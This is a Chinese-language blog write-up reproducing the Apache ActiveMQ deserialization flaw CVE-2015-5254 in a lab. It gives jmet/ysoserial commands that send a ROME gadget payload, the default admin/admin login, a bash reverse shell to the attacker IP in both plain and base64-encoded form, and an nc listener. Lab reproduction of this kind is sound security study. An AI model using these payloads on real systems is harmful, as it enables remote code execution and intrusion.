ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现

已于 2022-09-16 15:48:18 修改
阅读量1.4k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: activemq 安全 web安全
于 2022-09-16 15:21:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45314073/article/details/126887882
版权

1、Apache ActiveMQ

Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。

2、漏洞产生原理

该组件程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。

3、受影响版本

Apache ActiveMQ 5.x < Apache ActiveMQ 5.13.0

复现流程如下:

靶机IP:192.168.107.129

攻击机IP:192.168.107.130

启动环境

docker-compose up -d

查看启动的容器

docker ps

访问web页面

 攻击机执行以下命令:

cd var/opt 
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external

使用下载jmet的jar文件 ,Jmet原理是使用ysoserial生成payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch  /root/sucess" -Yp ROME   192.168.107.129  61616

 接下来,我们到web管理页面看是否添加了一条消息

 默认账号密码:admin/admin

回到靶机 打开靶场的bash,查看消息未触发前/root目录,没有任何文件

攻击机单击触发消息后,可见success目录被创建

通过发送构造的payload反弹靶场shell,攻击机使用nc监听

bash -i >& /dev/tcp/192.168.107.130/1234 0>&1

 使用base64编码payload绕过Java机制

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwNy4xMzAvMTIzNCAwPiYx

构造payload

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwNy4xMzAvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.107.129 61616

可以看到新增了一条内容

攻击机使用nc监听本机的1234端口

nc -lvp 1234

 攻击机单击触发反弹shell的payload消息

靶机的shell已经反弹到攻击机的12344端口上

 参考文章:ActiveMQ 反序列化漏洞

背着书包打太极
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 613
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
ActiveMQ 反序列化漏洞CVE-2015-5254
初岄的博客
09-13 175
ActiveMQ 反序列化漏洞CVE-2015-5254
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2905
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现
baidu_38844729的博客
01-22 545
前言 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码 步骤 搭建环境:docker+vulhub 1.下载jmet的jar文件,并在同目录下创建一个external文件夹 链接:https://g...
ActiveMQ 反序列化RCE漏洞CVE-2023-46604)
最新发布
zneVue
07-17 577
在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。
ActiveMQ 反序列化漏洞CVE-2015-5254复现
糖小喵
04-12 332
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用...
ActiveMQ反序列化漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7781
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
ActiveMQ反序列化漏洞原理+复现
ChenD的学习笔记
03-09 2271
ActiveMQ通过消息队列来实现信息传递,每个消息要保证发出端和接收端格式相同,其中使用了序列化的方法进行传递,在这个过程中没有限制可在代理中序列化的类,这时候我们就可以自己构造一份序列化的恶意代码payload,将其作为事件发到ActiveMQ服务上,在管理员在后台管理时触发了payload,或者攻击者使用弱口令拿到ActiveMQ的账户,并执行了payload,则可以成功利用该漏洞。消息队列,服务器A将客户发起的请求放入服务器B的消息队列中,服务器B从消息队列中取出并处理。
漏洞复现】---- ActiveMQ 反序列化漏洞CVE-2015-5254
qq_43168364的博客
09-04 694
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
qq_32642035的博客
10-17 1244
ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现
Apache activeMQ漏洞复现
Shanfenglan's blog
12-14 3224
文章目录1. ActiveMQ 反序列化漏洞CVE-2015-5254)2. ActiveMQ任意文件写入漏洞CVE-2016-3088)2.1 利用参考文章 1. ActiveMQ 反序列化漏洞CVE-2015-5254) Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 工具下载地址:http
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现
m0_69994768的博客
01-23 1156
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)
ActiveMQ反序列化漏洞复现(CVE-2015-5254)
m0_49025459的博客
10-31 955
这里复现的靶场使用的是vulhub搭建的,过多的我就不赘述了,直接启动靶场,启动正确我们访问IP(靶场IP):8161这里以192.168.218.132:8161为例,如果出现下图场景,则证明靶场搭建成。
activemq系列漏洞复现
m0_49420271的博客
06-07 2887
vulhub中activemq系列漏洞复现
CVE-2015-5254ActiveMQ 反序列化漏洞复现
p_utao的博客
03-19 434
漏洞介绍 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞复现 http://10.7.10.41:8161/admin 默认账号密码:admin 登陆成功
ActiveMQ 反序列化漏洞复现CVE-2015-5254
浮生一世暖流年的博客
12-18 270
环境搭建 使用vulhub搭建环境,docker-compose up -d 环境搭建以后,开始监听8161和61616两个端口,其中8161是web管理端的端口,61616是工作端口。 复现过程 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消息,发送给目标61616端口 访问web管理页面,读取消息,触发漏洞 生成序列化对象 使用jmt生成,在同目录下创建一个external文件夹,不然可能报文件不存在错误。 java -jar jmet-0.1.0-all.jar
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
huangyongkang666的博客
10-31 6322
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
ActiveMQ反序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
W小哥
11-10 3740
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
【vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1955
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值